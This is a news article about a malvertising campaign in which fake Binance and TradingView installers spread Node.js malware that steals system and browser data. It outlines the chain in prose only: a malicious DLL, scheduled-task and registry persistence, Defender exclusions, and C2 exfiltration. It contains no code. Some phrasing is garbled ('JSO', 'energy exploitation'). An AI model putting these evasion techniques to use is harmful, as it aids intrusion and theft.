Crypto Trap Uncovered: Fake Binance & TradingView Installers Spread Node.js Malware in Stealth Campaign

Microsoft has recently raised alarms over a malvertising campaign that has been actively targeting cryptocurrency users. Discovered in October 2024, the campaign employs Node.js to execute malicious activities that include information theft and data exfiltration. The attack leverages fake cryptocurrency trading software, such as Binance and TradingView, to deceive unsuspecting users into downloading and installing malware disguised as legitimate programs.

Rogue Installers Deployed via Malicious Websites

The attack is triggered when a victim is lured to fake websites that imitate popular cryptocurrency sites such as Binance or TradingView. Once a user installs the application from the fake site, the application then launches the rogue installer with a DLL file named “CustomActions.dll.” This DLL collects basic system data from the host machine and establishes persistence by creating a scheduled task to ensure that the malware runs. As part of the deception, the DLL uses “msedge_proxy.exe” to open a window that looks like a legitimate cryptocurrency site; this process allows it to display any site as a web application. That way, the user remains oblivious while the malicious code is executed.

Malware Avoids Detection by Microsoft Defender

After the malware is installed, it configures the system to exclude scanning by Microsoft Defender for Endpoint. By configuring exclusions for the running PowerShell process and its current directory, the malware avoids detection by security.  The malware downloads additional obfuscated PowerShell scripts from a remote server that take an extensive inventory of the victim’s system, including BIOS information, hardware information, operating system, and applications. The stolen data is then collected in JSO and sent to a command-and-control (C2) server using an HTTPS POST request.  This part of the attack chain allows hackers to collect valuable information for future energy exploitation.

Node.js Runtime and JavaScript Execution

The next step in the attack chain involves downloading and executing a Node.js runtime binary, along with a JavaScript compiled (JSC) file. The Node.js executable runs the JSC file, which establishes network connections and likely siphons sensitive information from the victim’s browser.

In some variants of the attack, the hackers use a technique known as ClickFix, which involves downloading the Node.js binary through a malicious PowerShell command and executing the JavaScript inline, rather than from a file. This inline JavaScript is responsible for discovering valuable assets on the victim’s network, disguising C2 traffic to look like legitimate Cloudflare activity, and ensuring persistence by modifying Windows Registry keys.

Node.js Malvertising: A New Threat Vector

Node.js, an open-source JavaScript runtime, has long been trusted by developers to build both frontend and backend applications. However, attackers are now exploiting its versatility to hide malicious activities within seemingly legitimate applications. By using Node.js to deliver malware, these threat actors can blend malicious activities with common software processes, bypassing traditional security measures and making detection more challenging.

Conclusion

The ongoing malvertising campaign using Node.js represents a growing threat to cryptocurrency users and general internet security. By exploiting trusted technologies like Node.js, attackers are able to mask their malicious activities and avoid detection by traditional security tools. This evolving threat highlights the importance of caution when downloading software from unfamiliar sources and underscores the need for advanced security measures to protect against such sophisticated attacks.

The post Crypto Trap Uncovered: Fake Binance & TradingView Installers Spread Node.js Malware in Stealth Campaign appeared first on Coinfomania.